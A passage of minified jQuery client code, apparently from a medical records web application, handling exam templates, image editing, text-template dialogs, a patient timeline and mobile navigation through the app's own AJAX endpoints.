c2 = c2.replace(a2, ''); $("#" + parent_id_entry2).val(c2); }).button('refresh'); } $("#"+parent_id_entry).find('.pe_entry').each(function(){ var parent_id1 = $(this).attr("id"); if (!!$(this).val()) { $('#' + parent_id1 + '_h').html(noshdata.item_present); } else { $('#' + parent_id1 + '_h').html(noshdata.item_empty); } }); }); $(document).on("click", ".all_normal2_pe", function(){ var parent_id = $(this).attr("id"); var parent_id_entry = parent_id.replace('_normal1',''); var old = $("#" + parent_id_entry).val(); var a = $(this).val(); if ($(this).is(':checked')) { if (old != '') { var b = old + ' ' + a; } else { var b = a; } $("#" + parent_id_entry).val(b); } else { var a1 = ' ' + a; var c = old.replace(a1,''); c = c.replace(a, ''); $("#" + parent_id_entry).val(c); } }); $(document).on("click", ".all_normal3_pe", function(){ var a = $(this).is(':checked'); var parent_id = $(this).attr("id"); var parent_id_entry = parent_id.replace('_normal1',''); $.ajax({ type: "POST", url: "ajaxencounter/all-normal/pe/" + parent_id_entry, dataType: 'json', success: function(data){ var message = ''; $.each(data, function(key, value){ if(a){ $("#" + key).val(value); message = "All normal values set!"; } else { $("#" + key).val(''); message = "All normal values cleared!"; } }); $.jGrowl(message); $("#"+parent_id_entry+"_dialog").find('.pe_entry').each(function(){ var parent_id1 = $(this).attr("id"); if (!!$(this).val()) { $('#' + parent_id1 + '_h').html(noshdata.item_present); } else { $('#' + parent_id1 + '_h').html(noshdata.item_empty); } }); } }); }); function loadimagepreview(){ $('#image_placeholder').html(''); $('#image_placeholder').empty(); var image_total = ''; $.ajax({ url: "ajaxchart/image-load", type: "POST", success: function(data){ $('#image_placeholder').html(data); image_total = $("#image_placeholder img").length; var $image = $("#image_placeholder img"); $image.tooltip(); $image.first().show(); var i = 1; $("#image_status").html('Image ' + i + ' of ' + image_total); $('#next_image').click(function () { var $next = $image.filter(':visible').hide().next('img'); i++; if($next.length === 0) { $next = $image.first(); i = 1; } $next.show(); $("#image_status").html('Image ' + i + ' of ' + image_total); }); $('#prev_image').click(function () { var $prev = $image.filter(':visible').hide().prev('img'); i--; if($prev.length === 0) { $next = $image.last(); i = image_total; } $prev.show(); $("#image_status").html('Image ' + i + ' of ' + image_total); }); } }); } $(document).on('click', '#edit_image', function () { var image = $("#image_placeholder img").filter(':visible').attr('src'); var image_id1 = $("#image_placeholder img").filter(':visible').attr('id'); var image_id = image_id1.replace('_image', ''); $('#wPaint').css({ width: document.getElementById(image_id1).naturalWidth, height: document.getElementById(image_id1).naturalHeight }).wPaint('resize'); $('.wPaint-menu-name-main').css({width:579}); $('.wPaint-menu-name-text').css({width:182,left:0,top:42}); $('.wPaint-menu-select').css({"overflow-y":"scroll"}); $('#wPaint').wPaint('image', image); $.ajax({ url: "ajaxchart/image-get/" + image_id, dataType: "json", type: "POST", success: function(data){ $.each(data, function(key, value){ $("#image_form :input[name='" + key + "']").val(value); }); $("#image_dialog").dialog('open'); } }); }); $(document).on('click', "#del_image", function() { var image_id1 = $("#image_placeholder img").filter(':visible').attr('id'); var image_id = image_id1.replace('_image', ''); if(confirm('Are you sure you want to delete this image?')){ $.ajax({ type: "POST", url: "ajaxchart/delete-image", data: "image_id=" + image_id, success: function(data){ $.jGrowl(data); loadimagepreview(); } }); } }); $(document).on('keydown', ':text', function(e){ if(e.keyCode==13) { e.preventDefault(); } }); $(document).on('keydown', ':password', function(e){ var a = $(this).attr('id'); if(a != 'password') { if(e.keyCode==13) { e.preventDefault(); } } }); $(document).on('keydown', '.textdump', function(e){ if(e.keyCode==39) { if(e.shiftKey==true) { e.preventDefault(); var id = $(this).attr('id'); $.ajax({ type: "POST", url: "ajaxsearch/textdump-group/" + id, success: function(data){ $("#textdump_group_html").html(''); $("#textdump_group_html").append(data); $(".edittextgroup").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetextgroup").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltextgroup").button({text: false, icons: {primary: "ui-icon-check"}}); $(".restricttextgroup").button({text: false, icons: {primary: "ui-icon-close"}}); $('.textdump_group_item_text').editable('destroy'); $('.textdump_group_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_group_target").val(id); $("#textdump_group").dialog("option", "position", { my: 'left top', at: 'right top', of: '#'+id }); $("#textdump_group").dialog('open'); } }); } } }); $(document).on('click', '.textdump_item', function() { if ($(this).find(':first-child').hasClass("ui-state-error") == false) { $(this).find(':first-child').addClass("ui-state-error ui-corner-all"); } else { $(this).find(':first-child').removeClass("ui-state-error ui-corner-all"); } }); $(document).on('click', '.textdump_item_specific', function() { if ($(this).find(':first-child').hasClass("ui-state-error") == false) { $(this).find(':first-child').addClass("ui-state-error ui-corner-all"); } else { $(this).find(':first-child').removeClass("ui-state-error ui-corner-all"); } }); $(document).on('click', '.edittextgroup', function(e) { var id = $(this).attr('id'); var isEditable= $("#"+id+"_b").is('.editable'); $("#"+id+"_b").prop('contenteditable',!isEditable).toggleClass('editable'); if (isEditable) { var url = $("#"+id+"_b").attr('data-url'); var pk = $("#"+id+"_b").attr('data-pk'); var name = $("#"+id+"_b").attr('data-name'); var title = $("#"+id+"_b").attr('data-title'); var type = $("#"+id+"_b").attr('data-type'); var value = encodeURIComponent($("#"+id+"_b").html()); $.ajax({ type: "POST", url: url, data: 'value=' + value + "&pk=" + pk + "&name=" + name, success: function(data){ toastr.success(data); } }); $(this).html('<i class="zmdi zmdi-edit"></i>'); $(this).siblings('.deletetextgroup').show(); $(this).siblings('.restricttextgroup').show(); } else { $(this).html('<i class="zmdi zmdi-check"></i>'); $(this).siblings('.deletetextgroup').hide(); $(this).siblings('.restricttextgroup').hide(); } }); $(document).on('click', '.edittexttemplate', function(e) { var id = $(this).attr('id'); e.stopPropagation(); $("#"+id+"_span").editable('show', true); }); $(document).on('click', '.edittexttemplatespecific', function(e) { var id = $(this).attr('id'); e.stopPropagation(); $("#"+id+"_span").editable('show', true); }); $(document).on('click', '.deletetextgroup', function() { var id = $(this).attr('id'); var template_id = id.replace('deletetextgroup_',''); $.ajax({ type: "POST", url: "ajaxsearch/deletetextdumpgroup/" + template_id, success: function(data){ $("#textgroupdiv_"+template_id).remove(); } }); }); $(document).on('click', '.restricttextgroup', function() { var id = $(this).attr('id'); var template_id = id.replace('restricttextgroup_',''); $("#restricttextgroup_template_id").val(template_id); $.ajax({ type: "POST", url: "ajaxsearch/restricttextgroup-get/" + template_id, dataType: 'json', success: function(data){ $.each(data, function(key, value){ $("#restricttextgroup_form :input[name='" + key + "']").val(value); }); } }); $("#restricttextgroup_dialog").dialog('open'); }); $(document).on('click', '.deletetexttemplate', function() { var id = $(this).attr('id'); var template_id = id.replace('deletetexttemplate_',''); $.ajax({ type: "POST", url: "ajaxsearch/deletetextdump/" + template_id, success: function(data){ $("#texttemplatediv_"+template_id).remove(); } }); }); $(document).on('click', '.deletetexttemplatespecific', function() { var id = $(this).attr('id'); var template_id = id.replace('deletetexttemplatespecific_',''); $.ajax({ type: "POST", url: "ajaxsearch/deletetextdump/" + template_id, success: function(data){ $("#texttemplatespecificdiv_"+template_id).remove(); } }); }); $(document).on('click', '.normaltextgroup', function() { var id = $("#textdump_group_target").val(); var a = $(this).val(); var old = $("#"+id).val(); var delimiter = $("#textdump_delimiter2").val(); if (a != 'No normal values set.') { var a_arr = a.split("\n"); var d = a_arr.join(delimiter); if ($(this).prop('checked')) { if (old != '') { var b = old + '\n' + d; } else { var b = d; } $("#"+id).val(b); } else { var a1 = d + ' '; var c = old.replace(a1,''); c = c.replace(d, ''); $("#" +id).val(c); } } else { $.jGrowl(a); } }); $(document).on('click', '.normaltexttemplate', function() { var id = $(this).attr('id'); var template_id = id.replace('normaltexttemplate_',''); if ($(this).prop('checked')) { $.ajax({ type: "POST", url: "ajaxsearch/defaulttextdump/" + template_id, success: function(data){ $.jGrowl('Template marked as normal default!'); $("#textdump_group_html").html(''); $("#textdump_group_html").append(data); $(".edittextgroup").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetextgroup").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltextgroup").button({text: false, icons: {primary: "ui-icon-check"}}); $(".restricttextgroup").button({text: false, icons: {primary: "ui-icon-close"}}); $('.textdump_group_item_text').editable('destroy'); $('.textdump_group_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); } }); } else { $.ajax({ type: "POST", url: "ajaxsearch/undefaulttextdump/" + template_id, success: function(data){ $.jGrowl('Template unmarked as normal default!'); $("#textdump_group_html").html(''); $("#textdump_group_html").append(data); $(".edittextgroup").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetextgroup").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltextgroup").button({text: false, icons: {primary: "ui-icon-check"}}); $(".restricttextgroup").button({text: false, icons: {primary: "ui-icon-close"}}); $('.textdump_group_item_text').editable('destroy'); $('.textdump_group_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); } }); } }); $(document).on('keydown', '#textdump_group_add', function(e){ if(e.keyCode==13) { e.preventDefault(); var a = $("#textdump_group_add").val(); if (a != '') { var str = $("#textdump_group_form").serialize(); if(str){ $.ajax({ type: "POST", url: "ajaxsearch/add-text-template-group", data: str, dataType: 'json', success: function(data){ $.jGrowl(data.message); var app = '<div id="textgroupdiv_' + data.id + '" style="width:99%" class="pure-g"><div class="pure-u-2-3"><input type="checkbox" id="normaltextgroup_' + data.id + '" class="normaltextgroup" value="No normal values set."><label for="normaltextgroup_' + data.id + '">Normal</label> <b id="edittextgroup_' + data.id + '_b" class="textdump_group_item textdump_group_item_text" data-type="text" data-pk="' + data.id + '" data-name="group" data-url="ajaxsearch/edit-text-template-group" data-title="Group">' + a + '</b></div><div class="pure-u-1-3" style="overflow:hidden"><div style="width:200px;"><button type="button" id="edittextgroup_' + data.id + '" class="edittextgroup">Edit</button><button type="button" id="deletetextgroup_' + data.id + '" class="deletetextgroup">Remove</button><button type="button" id="restricttextgroup_' + data.id + '" class="restricttextgroup">Restrictions</button></div></div><hr class="ui-state-default"/></div>'; $("#textdump_group_html").append(app); $(".edittextgroup").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetextgroup").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltextgroup").button({text: false, icons: {primary: "ui-icon-check"}}); $(".restricttextgroup").button({text: false, icons: {primary: "ui-icon-close"}}); $('.textdump_group_item_text').editable('destroy'); $('.textdump_group_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_group_add").val(''); } }); } else { $.jGrowl("Please complete the form"); } } else { $.jGrowl("No text to add!"); } } }); $(document).on('keydown', '#textdump_add', function(e){ if(e.keyCode==13) { e.preventDefault(); var a = $("#textdump_add").val(); if (a != '') { var str = $("#textdump_form").serialize(); if(str){ $.ajax({ type: "POST", url: "ajaxsearch/add-text-template", data: str, dataType: 'json', success: function(data){ $.jGrowl(data.message); var app = '<div id="texttemplatediv_' + data.id + '" style="width:99%" class="pure-g"><div class="textdump_item pure-u-2-3"><span id="edittexttemplate_' + data.id + '_span" class="textdump_item_text ui-state-error ui-corner-all" data-type="text" data-pk="' + data.id + '" data-name="array" data-url="ajaxsearch/edit-text-template" data-title="Item">' + a + '</span></div><div class="pure-u-1-3" style="overflow:hidden"><div style="width:400px;"><input type="checkbox" id="normaltexttemplate_' + data.id + '" class="normaltexttemplate" value="normal"><label for="normaltexttemplate_' + data.id + '">Mark as Default Normal</label><button type="button" id="edittexttemplate_' + data.id + '" class="edittexttemplate">Edit</button><button type="button" id="deletetexttemplate_' + data.id + '" class="deletetexttemplate">Remove</button></div></div><hr class="ui-state-default"/></div>'; $("#textdump_html").append(app); $(".edittexttemplate").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetexttemplate").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltexttemplate").button({text: false, icons: {primary: "ui-icon-check"}}); $('.textdump_item_text').editable('destroy'); $('.textdump_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_add").val(''); } }); } else { $.jGrowl("Please complete the form"); } } else { $.jGrowl("No text to add!"); } } }); $(document).on('keydown', '#textdump_specific_add', function(e){ if(e.keyCode==13) { e.preventDefault(); var a = $("#textdump_specific_add").val(); if (a != '') { var specific_name = $("#textdump_specific_name").val(); if (specific_name == '') { var id = $("#textdump_specific_target").val(); var start = $("#textdump_specific_start").val(); var length = $("#textdump_specific_length").val(); $("#"+id).textrange('set', start, length); $("#"+id).textrange('replace', a); $("#textdump_specific").dialog('close'); } else { var str = $("#textdump_specific_form").serialize(); if(str){ $.ajax({ type: "POST", url: "ajaxsearch/add-specific-template", data: str, dataType: 'json', success: function(data){ $.jGrowl(data.message); var app = '<div id="texttemplatespecificdiv_' + data.id + '" style="width:99%" class="pure-g"><div class="textdump_item_specific pure-u-2-3"><span id="edittexttemplatespecific_' + data.id + '_span" class="textdump_item_specific_text ui-state-error ui-corner-all" data-type="text" data-pk="' + data.id + '" data-name="array" data-url="ajaxsearch/edit-text-template-specific" data-title="Item">' + a + '</span></div><div class="pure-u-1-3" style="overflow:hidden"><div style="width:400px;"><button type="button" id="edittexttemplatespecific_' + data.id + '" class="edittexttemplatespecific">Edit</button><button type="button" id="deletetexttemplatespecific_' + data.id + '" class="deletetexttemplatespecific">Remove</button></div></div><hr class="ui-state-default"/></div>'; $("#textdump_specific_html").append(app); $(".edittexttemplatespecific").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetexttemplatespecific").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".defaulttexttemplatespecific").button(); $('.textdump_item_specific_text').editable('destroy'); $('.textdump_item_specific_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_specific_add").val(''); } }); } else { $.jGrowl("Please complete the form"); } } } else { $.jGrowl("No text to add!"); } } }); $(document).on("change", "#hippa_address_id", function () { var a = $(this).find("option:selected").first().text(); if (a != 'Select Provider') { $("#hippa_provider1").val(a); } else { $("#hippa_provider1").val(''); } }); $(document).on('click', "#hippa_address_id2", function (){ var id = $("#hippa_address_id").val(); if(id){ $("#print_to_dialog").dialog("option", "title", "Edit Provider"); $.ajax({ type: "POST", url: "ajaxsearch/orders-provider1", data: "address_id=" + id, dataType: "json", success: function(data){ $.each(data, function(key, value){ $("#print_to_form :input[name='" + key + "']").val(value); }); } }); } else { $("#print_to_dialog").dialog("option", "title", "Add Provider"); } $("#print_to_origin").val('hippa'); $("#print_to_dialog").dialog('open'); }); $(document).on("change", "#hippa_request_address_id", function () { var a = $(this).find("option:selected").first().text(); if (a != 'Select Provider') { $("#hippa_request_to").val(a); } else { $("#hippa_request_to").val(''); } }); $(document).on('click', "#hippa_request_address_id2", function (){ var id = $("#hippa_request_address_id").val(); if(id){ $("#print_to_dialog").dialog("option", "title", "Edit Provider"); $.ajax({ type: "POST", url: "ajaxsearch/orders-provider1", data: "address_id=" + id, dataType: "json", success: function(data){ $.each(data, function(key, value){ $("#print_to_form :input[name='" + key + "']").val(value); }); } }); } else { $("#print_to_dialog").dialog("option", "title", "Add Provider"); } $("#print_to_origin").val('request'); $("#print_to_dialog").dialog('open'); }); $(document).on('click', '.assessment_clear', function(){ var id = $(this).attr('id'); var parts = id.split('_'); console.log(parts[2]); $("#assessment_" + parts[2]).val(''); $("#assessment_icd" + parts[2]).val(''); $("#assessment_icd" + parts[2] + "_div").html(''); $("#assessment_icd" + parts[2] + "_div_button").hide(); }); $(document).on('click', '.hedis_patient', function() { var id = $(this).attr('id'); var pid = id.replace('hedis_', ''); $.ajax({ type: "POST", url: "ajaxsearch/openchart", data: "pid=" + pid, success: function(data){ $.ajax({ type: "POST", url: "ajaxsearch/hedis-set", dataType: "json", success: function(data){ window.location = data.url; } }); } }); }); $(document).on('click', '.claim_associate', function() { var id = $(this).attr('id'); var form_id = id.replace('era_button_', 'era_form_'); var div_id = id.replace('era_button_', 'era_div_'); var bValid = true; $("#" + form_id).find("[required]").each(function() { var input_id = $(this).attr('id'); var id1 = $("#" + input_id); var text = $("label[for='" + input_id + "']").html(); bValid = bValid && checkEmpty(id1, text); }); if (bValid) { var str = $("#" + form_id).serialize(); if(str){ $.ajax({ type: "POST", url: "ajaxfinancial/associate-claim", data: str, success: function(data){ $.jGrowl(data); $("#" + form_id).clearForm(); $('#' + div_id).remove(); } }); } else { $.jGrowl("Please complete the form"); } } }); function textdump(elem) { var id = $(elem).attr('id'); $.ajax({ type: "POST", url: "ajaxsearch/textdump-group/" + id, success: function(data){ $("#textdump_group_html").html(''); $("#textdump_group_html").append(data); $(".edittextgroup").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetextgroup").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".normaltextgroup").button({text: false, icons: {primary: "ui-icon-check"}}); $(".restricttextgroup").button({text: false, icons: {primary: "ui-icon-close"}}); $('.textdump_group_item_text').editable('destroy'); $('.textdump_group_item_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_group_target").val(id); $("#textdump_group").dialog("option", "position", { my: 'left top', at: 'right top', of: '#'+id }); $("#textdump_group").dialog('open'); } }); } $(document).on('click', 'textarea', function(e) { var stopCharacters = [' ', '\n', '\r', '\t', ',']; var id = $(this).attr('id'); var val = $(this).val(); $(this).html(val.replace(/[&\/\-\.]/g, 'a')); var text = $(this).html(); var start = $(this)[0].selectionStart; var end = $(this)[0].selectionEnd; while (start > 0) { if (stopCharacters.indexOf(text[start]) == -1) { --start; } else { break; } }; ++start; while (end < text.length) { if (stopCharacters.indexOf(text[end]) == -1) { ++end; } else { break; } } if (start == 1) { start = 0; } var startW = text.substr(start,1); var endW = text.substr(end-1,1); if (startW == '*' && endW == '*') { $(this).textrange('set', start, end - start); var currentWord = text.substr(start + 1, end - start - 2); if (currentWord != '') { if (currentWord == '~') { $("#textdump_specific_target").val(id); $("#textdump_specific_name").val(''); $("#textdump_specific_start").val(start); $("#textdump_specific_length").val(end - start); $("#textdump_delimiter_div").hide(); $("#textdump_specific_save").hide(); $("#textdump_specific_done").hide(); $("#textdump_specific").dialog("option", "position", { my: 'left top', at: 'right top', of: '#'+id }); $("#textdump_specific").dialog('open'); } else { $.ajax({ type: "POST", url: "ajaxsearch/textdump-specific/" + currentWord, success: function(data){ $("#textdump_specific_html").html(''); $("#textdump_specific_html").append(data); $(".edittexttemplatespecific").button({text: false, icons: {primary: "ui-icon-pencil"}}); $(".deletetexttemplatespecific").button({text: false, icons: {primary: "ui-icon-trash"}}); $(".defaulttexttemplatespecific").button(); $('.textdump_item_specific_text').editable('destroy'); $('.textdump_item_specific_text').editable({ toggle:'manual', ajaxOptions: { headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); }, error: function(xhr) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } } } }); $("#textdump_specific_target").val(id); $("#textdump_specific_name").val(currentWord); $("#textdump_specific_start").val(start); $("#textdump_specific_length").val(end - start); $("#textdump_specific_done").hide(); $("#textdump_specific").dialog("option", "position", { my: 'left top', at: 'right top', of: '#'+id }); $("#textdump_specific").dialog('open'); } }); } } } }); $(document).on('change', '.encounter_template_group_group', function() { var id = $(this).attr('id'); var a1 = id.split("_"); var count = a1[4]; var a = $("#"+id).val(); $.ajax({ type: "POST", url: "ajaxsearch/get-template-normal-options/" + a, dataType: "json", success: function(data){ $("#encounter_template_array_id_"+count).removeOption(/./); $("#encounter_template_array_id_"+count).addOption({'':'Choose Group'}, false); $("#encounter_template_array_id_"+count).addOption(data, false); } }); }); $(document).on('click', '#autogenerate_encounter_template', function() { $('#dialog_load').dialog('option', 'title', "Autogenerating template...").dialog('open'); var str = $("#template_encounter_edit_form").serialize(); if(str){ $.ajax({ type: "POST", url: "ajaxsearch/autogenerate-encounter-template", data: str, dataType: "json", success: function(data){ $.jGrowl(data.message); if (data.name != '') { $("#template_encounter_edit_dialog").dialog('close'); $('#dialog_load').dialog('close'); $('#dialog_load').dialog('option', 'title', "Loading template...").dialog('open'); $.ajax({ type: "POST", url: "ajaxsearch/get-encounter-templates-details", data: 'template_name='+data.name, dataType: "json", success: function(data){ $('#dialog_load').dialog('close'); $("#template_encounter_edit_div").html(data.html); loadbuttons(); $("#template_encounter_edit_dialog").dialog("option", "title", "Edit Encounter Template"); $("#template_encounter_edit_dialog").dialog('open'); } }); } } }); } }); $(document).on('click', '.remove_encounter_template_field', function() { var id = $(this).attr('id'); var a1 = id.split("_"); var count = a1[4]; $("#group_encounter_template_div_"+count).remove(); $("#array_encounter_template_div_"+count).remove(); $("#remove_encounter_template_div_"+count).remove(); }); $(document).on('click', "#timeline_chart", function() { $('#dialog_load').dialog('option', 'title', "Loading timeline...").dialog('open'); $.ajax({ type: "POST", url: "ajaxsearch/timeline", dataType: "json", success: function(data){ var json = data.json; for (var key in json) { if (json.hasOwnProperty(key)) { json[key]['startDate'] = new Date(json[key]['startDate'] * 1000); if (json[key]['endDate'] != null) { json[key]['endDate'] = new Date(json[key]['endDate'] * 1000); } } } $("#timeline").timeCube({ data: json, granularity: data.granular, startDate: new Date(data.start * 1000), endDate: new Date(data.end * 1000), transitionAngle: 60, transitionSpacing: 100, nextButton: $("#next-link"), previousButton: $("#prev-link"), showDate: true }); $('#dialog_load').dialog('close'); $('#timeline_dialog').dialog('open'); } }); }); $(document).on('click', '.timeline_event', function() { var type = $(this).attr('type'); var value = $(this).attr('value'); var status = $(this).attr('status'); var acl = false; if (noshdata.group_id == '2' || noshdata.group_id == '3') { acl = true; } if (type == 'eid') { if (status == 'Yes') { if (acl) { $("#encounter_view").load('ajaxchart/modal-view/' + value); } else { $.ajax({ type: "POST", url: "ajaxcommon/opennotes", success: function(data){ if (data == 'y') { $("#encounter_view").load('ajaxcommon/modal-view2/' + value); } else { $.jGrowl('You cannot view the encounter as your provider has not activated OpenNotes.'); } } }); } $("#encounter_view_dialog").dialog('open'); } else { $.jGrowl('Encounter is not signed. You cannot view it at this time.'); } } else if (type == 't_messages_id') { if (status == 'Yes') { if (acl) { $("#message_view").load('ajaxcommon/tmessages-view/' + value); $("#t_messages_id").val(value); t_messages_tags(); $("#messages_view_dialog").dialog('open'); } else { $.ajax({ type: "POST", url: "ajaxcommon/opennotes", success: function(data){ if (data == 'y') { $("#message_view").load('ajaxcommon/tmessages-view/' + value); $("#t_messages_id").val(value); $("#messages_view_dialog").dialog('open'); } else { $.jGrowl('You cannot view the message as your provider has not activated OpenNotes.'); } } }); } } else { $.jGrowl('Message is not signed. You cannot view it at this time.'); } } console.log(value + "," + type); }); // Mobile $(document).on('click', '.ui-title', function(e) { $("#form_item").val(''); $("#search_results").html(''); var url = $(location).attr('href'); var parts = url.split("/"); if (parts[4] == 'chart_mobile') { $.mobile.loading("show"); $.ajax({ type: "POST", url: "../ajaxchart/refresh-timeline", success: function(data){ $("#content_inner_timeline").html(data); $("#content_inner_main").show(); $("#content_inner").hide(); //refresh_timeline(); $.mobile.loading("hide"); } }); } }); $(document).on('click', '.mobile_click_home', function(e) { var classes = $(this).attr('class').split(' '); for (var i=0; i<classes.length; i++) { if (classes[i].indexOf("ui-") == -1) { if (classes[i] != 'mobile_click_home') { //console.log(classes[i]); //var link = classes[i].replace("mobile_",""); //$.mobile.loading("show"); //$.ajax({ //type: "POST", //url: "ajaxdashboard/" + link, //success: function(data){ //$("#content_inner").html(data).trigger('create').show(); //$("#content_inner_main").hide(); //$.mobile.loading("hide"); //} //}); window.location = classes[i]; break; } } } }); $(document).on('click', '.mobile_click_chart', function(e) { var classes = $(this).attr('class').split(' '); for (var i=0; i<classes.length; i++) { if (classes[i].indexOf("ui-") == -1) { if (classes[i] != 'mobile_click_chart') { console.log(classes[i]); var link = classes[i].replace("mobile_",""); $.ajax({ type: "POST", url: "../ajaxchart/" + link + "/true", success: function(data){ $("#content_inner").html(data).trigger('create').show(); $.mobile.loading("hide"); $("#content_inner_main").hide(); $("#left_panel").panel('close'); } }); break; } } } }); $(document).on('click', '.mobile_link', function(e) { $.mobile.loading("show"); $("#content").hide(); $("#chart_header").hide(); var url = $(this).attr('data-nosh-url'); var origin = $(this).attr('data-nosh-origin'); $.ajax({ type: "POST", url: url, data: 'origin=' + origin, dataType: 'json', success: function(data){ $("#navigation_header_back").attr('data-nosh-origin', origin); $("#navigation_header_save").attr('data-nosh-form', data.form); $("#navigation_header_save").attr('data-nosh-origin', origin); if (data.search != '') { $(".search_class").hide(); $("#"+data.search+"_div").show(); $("#"+data.search+"_div").find('ul').attr('data-nosh-paste-to',data.search_to); } $("#edit_content_inner").html(data.content).trigger('create'); $("#navigation_header").show(); $("#edit_content").show(); $.mobile.loading("hide"); } }); }); $(document).on('click', '#navigation_header_back', function(e) { $.mobile.loading("show"); var origin = $(this).attr('data-nosh-origin'); if (origin == 'Chart') { $("#navigation_header").hide(); $("#content_inner").hide(); $("#chart_header").show(); $("#content_inner_main").show(); $.mobile.loading("hide"); var scroll = parseInt($(this).attr('data-nosh-scroll')); $.mobile.silentScroll(scroll-70); } else { $.ajax({ type: "POST", url: origin, success: function(data){ $("#content_inner").html(data).trigger('create'); $("#edit_content").hide(); $("#navigation_header").hide(); $("#content").show(); $("#chart_header").show(); $.mobile.loading("hide"); } }); } }); $(document).on('click', '.cancel_edit', function(e) { $.mobile.loading("show"); var origin = $(this).attr('data-nosh-origin'); $.ajax({ type: "POST", url: origin, success: function(data){ $("#content_inner").html(data).trigger('create'); $("#edit_content").hide(); $("#navigation_header").hide(); $("#content").show(); $("#chart_header").show(); $.mobile.loading("hide"); } }); }); $(document).on('click', '.cancel_edit2', function(e) { var form = $(this).attr('data-nosh-form'); $("#"+form).clearForm(); $("#edit_content").hide(); $("#content").show(); }); $(document).on('click', '.nosh_schedule_event', function(e) { var editable = $(this).attr('data-nosh-editable'); if (editable != "false") { var id = $(this).attr('id'); if (id == 'patient_appt_button') { loadappt(); var startday = $(this).attr('data-nosh-start'); $('#start_date').val(startday); $("#edit_content").show(); $("#content").hide(); $("#title").focus(); $.mobile.silentScroll(0); return false; } if (id == 'event_appt_button') { loadevent(); var startday = $(this).attr('data-nosh-start'); $('#start_date').val(startday); $("#edit_content").show(); $("#content").hide(); $("#title").focus(); $.mobile.silentScroll(0); return false; } var form = {}; $.each($(this).get(0).attributes, function(i, attr) { if (attr.name.indexOf("data-nosh-") == '0') { var field = attr.name.replace('data-nosh-',''); field = field.replace('-', '_'); if (field == 'visit_type') { form.visit_type = attr.value; } if (field == 'title') { form.title = attr.value; } if (attr.value != 'undefined') { if (field != 'timestamp') { var value = attr.value; if (field.indexOf('_date') > 0) { value = moment(new Date(value)).format('YYYY-MM-DD'); } if (field == 'pid') { field = 